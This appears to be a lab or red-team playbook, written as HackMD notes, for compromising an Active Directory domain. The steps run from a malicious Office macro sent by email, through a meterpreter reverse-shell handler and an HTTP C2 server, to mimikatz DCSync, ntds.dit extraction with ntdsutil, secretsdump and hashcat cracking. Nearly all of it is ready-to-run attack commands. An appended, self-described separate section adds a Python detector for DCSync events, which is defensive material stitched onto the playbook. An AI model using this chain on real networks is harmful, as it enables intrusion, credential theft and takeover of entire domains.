# Payload

###### tags: `Chimera`

[TOC]

## Send mail containing malicious macro code

### Create an Office file with macro code

![](https://i.imgur.com/ZMJisQp.png)

## Wait for the victim to open it, then get a reverse shell

### Build the msfconsole handler

```=
use exploit/multi/handler
set encoder x64/xor_dynamic
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 7777
set ExitOnSession false
exploit -j -z
```

### Build the C2 server (HTTP)

```=
python3 -m http.server
```

## Dump AD user NTLM and crack it on Win10

### Upload mimikatz from Kali (meterpreter)

1. Get the file location (in shell)
1. Upload mimikatz

```cmd=
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe C:\\Users\\ITM\\Desktop\\mimikatz.exe
upload /usr/share/windows-resources/mimikatz/x64/mimidrv.sys C:\\Users\\ITM\\Desktop\\mimidrv.sys
upload /usr/share/windows-resources/mimikatz/x64/mimilib.dll C:\\Users\\ITM\\Desktop\\mimilib.dll
```

### Get the domain and username in Kali (meterpreter)

```cmd=
shell
whoami
ipconfig /all
```

### Dump the user's NTLM in Kali (meterpreter)

```cmd=
cd c:\Users\ITM\Desktop\
mimikatz.exe lsadump::dcsync /domain:chimera.org /user:ITM ##get ntlm
```

### Crack the user's password in Kali (other terminal)

```cmd=
echo <username>:<UID>:aad3b435b51404eeaad3b435b51404ee:<NTLM>::: > crack.txt
hashcat -m 1000 -a 0 crack.txt wordlist.txt -o ans.txt
```

:::info
* If the user's password does not meet the length requirement, the hash prefix is aad3b435b51404eeaad3b435b51404ee
* Hashcat NTLM format: `<username>:<UID>:<Hash Prefix>:<Hash Suffix>:::`
* The UID is not important here
:::

## Log in to the AD server & crack all AD user passwords

### RDP to the AD server from Kali

```cmd=
rdesktop -u ITM -p <password> -d <domain> <IP> -r disk:<name>=<local file addr>
```

:::info
-u username
-p password
-d domain
-r redirect a local resource (here a local directory shared into the session as a disk)
:::

### Get ntds.dit and SYSTEM in the AD server cmd (admin)

```cmd=
ntdsutil
activate instance ntds
ifm
create full C:\ntdsutil
quit
quit
```

### Crack all users & passwords

1. Get SYSTEM and ntds.dit back to Kali
1. Dump (in Kali)

```cmd=
impacket-secretsdump -system <SYSTEM> -ntds <ntds.dit> LOCAL
```

1. Make hash.txt
1. Crack

```cmd=
hashcat -m 1000 -a 0 hash.txt wordlist.txt -o password.txt
```
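Detection side of the `lsadump::dcsync` step above, as an added example that is not part of this note: a Python check that flags Windows Security event 4662 records in which an account that is not a domain controller exercised the directory replication control-access rights. The event records, the `ITM` and `DC01$` principals and the DC account list are constructed for the example.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662 records."""
import re

# Control-access right GUIDs whose combination grants directory replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}")

# Constructed sample: the fields of already-parsed 4662 records, not real log data.
# DC01$ replicating is normal; a user account doing so is the DCSync signature.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "ITM", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "ITM", "AccessMask": "0x20",
     "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},  # unrelated object access
    {"EventID": 4624, "SubjectUserName": "ITM", "AccessMask": "", "Properties": ""},
]
DC_ACCOUNTS = {"DC01$"}  # machine accounts of the known domain controllers (constructed)


def replication_rights(event: dict) -> list[str]:
    """Return the replication rights named in the event's Properties field."""
    guids = GUID_RE.findall(event.get("Properties", "").lower())
    return sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)


def is_dcsync(event: dict, dc_accounts: set[str]) -> bool:
    """True when a non-DC principal exercised a replication control-access right."""
    if event.get("EventID") != 4662 or event.get("AccessMask") != "0x100":
        return False
    if not replication_rights(event):
        return False
    return event.get("SubjectUserName") not in dc_accounts


def find_dcsync(events: list[dict], dc_accounts: set[str]) -> list[tuple[str, list[str]]]:
    """Collect (account, rights) for every suspicious replication request."""
    return [(e["SubjectUserName"], replication_rights(e))
            for e in events if is_dcsync(e, dc_accounts)]


if __name__ == "__main__":
    for account, rights in find_dcsync(SAMPLE_EVENTS, DC_ACCOUNTS):
        print(f"possible DCSync by {account}: {', '.join(rights)}")
```

On a real domain, 4662 auditing for directory service access must be enabled on the DCs, and the DC allowlist should come from the domain's actual controller list rather than a hard-coded set.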